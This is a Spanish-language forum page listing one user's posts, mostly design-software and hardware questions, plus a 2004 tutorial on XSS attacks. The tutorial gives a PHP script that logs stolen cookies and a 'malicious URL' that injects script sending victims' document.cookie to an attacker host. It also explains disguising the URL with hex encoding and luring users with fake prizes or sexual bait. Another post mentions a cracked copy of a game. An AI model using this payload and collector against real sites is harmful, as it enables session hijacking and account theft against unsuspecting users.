elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Recopilación Tutoriales y Manuales Hacking, Seguridad, Privacidad, Hardware, etc


  Mostrar Temas
Páginas: [1]
1  Media / Diseño Gráfico / Flash CS4 - AS3 - Desactivar varios botones al pulsar uno. en: 3 Septiembre 2009, 18:44 pm
Holas!

Me paso por aquí después de mucho tiempo, a ver si alguien puede echarme una manilla con un problema que tengo con actionscript 3.

Tengo una rueda con 8 radios. Cada uno de los radios tiene 10 botones.
Lo que quiero es que cuando con el ratón pulse un botón de un radio, los demás botones de ese radio lleven su propiedad enabled a false.

Por ejemplo, uno de los radios va sobre la familia...es decir del 1 al 10 tienen que señalar como consideran que están en ese aspecto.
Los nombre de instancia de los 10 botones son: familia0, familia1, familia2...familia9;

Entonces cuando pulse familia3, yo almaceno la posicion del botón pulsado y lo que quiero es que todos(incluido familia3) se desactiven.

Cuando se produce un evento click con el raton sobre un botón uso event.target.name para quitarle el ultimo caracter(el numero 0-9) y tengo que usar el resto("familia") para desactivarlos todos...pero no se como xD

Tendré que usar un bucle para ir desactivándolos pero no se como acceder a ellos sabiendo su nombre :S

Soy así de torpe jeje

A ver si alguien me lanza un rayo de luz, porque no quiero tener que poner un array con cada uno de los grupos de botones, quiero hacerlo "bonito" ;)

Un saludo ;)
2  Media / Diseño Gráfico / Photoshop CS3 - Brocha muy poca intensidad en: 4 Mayo 2007, 15:17 pm
Holas.

Tengo un pequeño problema, hasta hace dos dias he estado usando la utilidad de la broma sin ningún problema pero no se si he tocado algo o que leches pasa que ahoramismo tiene muy poca intensidad.

Me explico. Que si yo tengo seleccionado el color negro, por ejemplo, no pinta negro sino gris, si tengo el rojo, no pinta rojo sino un rojo muy clarito.

El problema está en la brocha porque si utilizo el lápiz u otra utilidad va sin problemas y se pinta con el color que tengo seleccionado.

Alomejor es solo una tontería, pero no consigo dar con la solución :/

Gracias ;)
3  Media / Juegos y Consolas / BattleField 1942 - Error al conectar al servidor. en: 1 Noviembre 2004, 21:44 pm
Holas.

Pues tengo ese pequeño problemilla. Cuando intento conectar a un servidor en modo multijugador SIEMPRE me dice:

"Error: No se puede conectar con el servidor"

P.D: El juego es descargado de internet y crackeado con el crack que traía...


¿Como puedo solucionarlo?
4  Media / Diseño Gráfico / Texto transparente en photoshop 7 en: 14 Octubre 2004, 08:05 am
Holas.

Haber, yo creo una nueva imagen en photoshop, le pongo un fondo rojo(por ejemplo) e inserto un texto con la herramienta de texto(xD).
Haber si puedo explicar lo que quiero...
Lo que yo quiero es eliminar(dejarlo transparente) el fondo que hay debajo de el texto introducido de forma que esa zona que ocupa el texto sea transparente(incluyendo el texto).

¿¡¡Alguien lo entiende!!?

P.D: He modificado la pregunta inicial para hacerla mas comprensible.
5  Informática / Tutoriales - Documentación / [::Tutorial::] - Ataques XSS en: 24 Mayo 2004, 03:49 am
Bueno pues voy ha hacer una pequeña introducción a los ataques XSS, el caso que voy a poner es el de una web que utilize cookies y tenga un buscador(el típico buscador que tiene una caja de texto y un botón).
decir que para una facil compresión de este mini-tutorial es mejor tener unos conocimientos básicos sobre html.

[~]Lo primero es hacer una pequeña introduccion sobre que es una cookie:
Citar
- Una cookie es un almacen de informacion que se guarda en el ordenador del usuario y en cualkier momento la pagina puede pedir la informacion, que contiene la cookie, al ordenador del usuario...

  • Ahora que sabemos que es una cookie lo que vamos ha hacer es ver el nombre de la página donde se encuentra el buscador, en nuestro caso es buscador.php(xDD)
  • Después vamos a ver si el buscador es vulnerable. Para ello podemos poner en el buscador, por ejemplo:
Código:
<script>alert()</script>

[~]Si salta una alarma al pulsar el boton, significa que ese buscador es vulnerable.
[~]Si no salta pues no jodemos y a buscar otro...

  • Suponiendo que sea vulnerable, el siguiente paso es ver el nombre de la caja de texto y del botón.
Para esto, tenemos que ver el codigo fuente de dicha página y buscar algo como:
<input type="text" name="palabra"> que será el textbox(caja de texto xD).
<input type="submit" name="buscar" value="Buscar"> que será el boton.

  • Ahora ya sabemos que el textbox se llama palabra y que el botón se llama buscar.

    [~]Para almacenar las cookies, tenermos dos opciones -> almazenarlas en una base de datos(mysql) o almacenarlas en un archivo de texto(la mas facil).

  • A continuacion vamos a crear una pagina en php, este archivo creará otro (archivo.txt) cuando algun usuario caiga en el ataque y escribira a continuacion los siguientes usuarios.
cookies.php
Código:
<?
$cookie = $_GET['cookie'];
$fff = fopen("archivo.txt","a");
fwrite($fff, "$cookie \n");
fclose($fff);
?>

archivo.txt
Este archivo se creara automaticamente y será en el que se almacenen las cookies, osease, que para ver los resultados teneis que entrar en este archivo.

  • Una vez hecho este paso solo tenemos que crear "LA URL MALIGNA"(como yo lo llamo) que será de la siguiente forma:
Código:
http://www.vulnerable.com/buscador.php?palabra=<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>&buscar=;

  • Voy a explicar cada parte de esta "URL MALIGNA".
  • [~]
http://www.vulnerable.com/buscador.php
Esta parte lo unico que hace es entrar en la pagina del buscador.

[~]?palabra=
Esta parte es para darle un valor a la variable palabra, es decir, si el textbox se llamara manolo esto quedaría de la siguiente forma: ?manolo=

Lo mas importante:
[~]<script>window.location='http://www.atacante.com/cookies.php?cookie='+document.cookie;</script>
Esto es el valor que le damos a la variable palabra (que es el textbox). Este valor lo que hace esque redirecciona a la pagina http://www.atacante.com/cookie.php y le da el valor de la cookie(del usuario de la web) a la variables cookie de la pagina que creamos antes(cookies.php)
Suena un poco lioso pero es muy simple.

[~]&buscar=;
Esto lo que hace es simular que el boton (con el nombre -> buscar) este pulsado, sin esto no realizaria la acción.
Tambien decir que si el botón del buscador se llamara jose, eso tendriamos que reemplazarlo por &jose=;

  • Ahora viene la parte mas importante, que es hacer que un usuario de esa web(que esté registrado) entre en ese enlace("LA URL MALIGNA").
Esto seguramente sea la parte mas complicada, porque cualkier persona con unos conocimientos muy basicos de programacion web sabría lo que hace esa "URL MALIGNA". Con lo cual vamos a proceder a "camuflar" un poco esa URL.
Para esto vamos a sustituir cada caracter por su correspondiente valor en hexagesimal poniendo el signo % delante de cada uno.

Aquí os dejo una buena tabla HEX:
http://www.ascii.cl/es/

Con lo cual iría quedando algo así:
Código:
%70%61%6C%61%62%72%61%3D%3C%73%63%72%69%70%74%3E...
esto equivaldría a:
Código:
palabra=<script>...
y tendrias que continuar cambiando los caracteres a hexagesimal.

Como conseguir que un usuario de esa web entre en esa URL, jejeje, pues ¡¡¡puedes decirle que le toca un premio si entra!!!(xDD) o puedes entrar al foro de esa web(si lo tuviera) y poner la direccion con alguna buena escusa como: "Que le pasa a la web, cuando entro en esta URL me sale una tía en bolas";
Otra opción es ponerlo como una noticia (si tienes un sistemas de noticias) o como se te ocurra.

=============================================
Solo me queda decir que no solo son vulnerbles a un ataque XSS los buscadores, puede ser cualquier formulario que os encontreis por internet, desde un registro de usuario hasta un foro(lo digo por experiencia).
=============================================

CONCLUSION: Este ataque se basa en redireccionar a un usuario(sea como sea) hacia una pagina, tuya, en la que guardes su cookie.

Creo que como introduccion no esta mal, aunque por las bullas de ponerlo pronto a lomejor me he quedado sin decir algo, weno si me acuerdo lo pongo...

Saludos by neohex

P.D:Por supuesto si algo esta mal o lo sabeis explicar mejor o esto es una *****, pues decirlo aqui...

P.D2:No sabía si ponerlo en Exploit o en Dudas hack, si lo considerais necesario moverlo.
6  Informática / Software / Instalar Grabadora(exactamente un cable) en: 10 Mayo 2004, 23:44 pm
Buenas, voy a plantearos mi problema poniendo unas imagenes tomadas por mi mismo, etc

Mi problema es el siguiente:
- Yo me compré hará 3 años una grabadora, quemadora, tostadora, vatidora (como querais llamarla) y como no tenia ni idea de como inatalarla pues la llevé a una tienda de informática y me la instalaron. Hasta aquí todo claro...
- Yo abrí mi PC y me fijé donde estaba puesto cada cable...y a partir de ahí yo la quite y la puse en 3 ó 4 PC's de diferentes personas y funcionaba sin problemas.

Ahora viene el problema:
Después de llevar un año sin usarla y estando ésta desconectada, ahora que me he comprado un nuevo PC pues no se como volver a instalarla y me parece una gilipollez llevarla a una tienda teniendoos a vosotros aquí(xDDDD).
En realidad solo hay un cable que no se donde poner, mejor dicho...solo hay una ranura/enchufe/hueco o como se llame en rl que no se que cable poner...
como una imagen vale mas que mil palabras voy a poner un par de ellas:

imagen1


El cable A.- Lo conecto en la, denominada por mi(que no se nada d hardware), placa base.
El cable B.- Lo conecto en la en la placa base.

El cable C.- ESTE ES EL HUECO/RANURA EN EL CUAL NO SE QUE CABLE PONER

:::::::::::::::::::::::::::::::
Ahora...yo mas o menos se que lo que interviene es la CPU, la unidad C:\ y la grabadora.
:::::::::::::::::::::::::::::::

Cuando yo compré la grabadora no tenia el cable C de la imagen1 y éste me lo pusieron en la tienda.
Así estaban las conexiones en mi antiguo PC:

imagen2


-----------------
He intentado instalarla poniendola de la misma forma que en mi antiguo PC pero no funciona, cuando enciendo el PC se queda en pillao en el logo de Pentium.
-----------------

Aquí dejo otra foto por si sirve de ayuda para que me digais que cable pongo, o que quito y donde lo pongo...

imagen3




P.D: Como podreis comprobar no tengo ni puñetera idea de esto, así que no se si me he quedado corto con la explicación o me he pasado.
P.D.2: No sabía si ponerlo en el foro "Grabadoras" o en "Hardware".

Gracias...
7  Media / Diseño Gráfico / girar con swish en: 28 Marzo 2004, 21:12 pm
hay alguna forma de girar un objeto sobre si mismo con Swish???...no se si me explico...
8  Media / Diseño Gráfico / degrado en photoshop 7 en: 27 Marzo 2004, 16:11 pm
miren..mi problema es el siguiente:
abro el photoshop, nuevo proyecto, inserto un circulo y intento utilizar la herramienta de degrado con el circulo y me salta este error...
Citar
No se a podido usar la herramienta degrado porke el contenido en la capa no se puede modificar directamente

como puedo solucionarlo para que el color del circulo sea degradado
Páginas: [1]
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines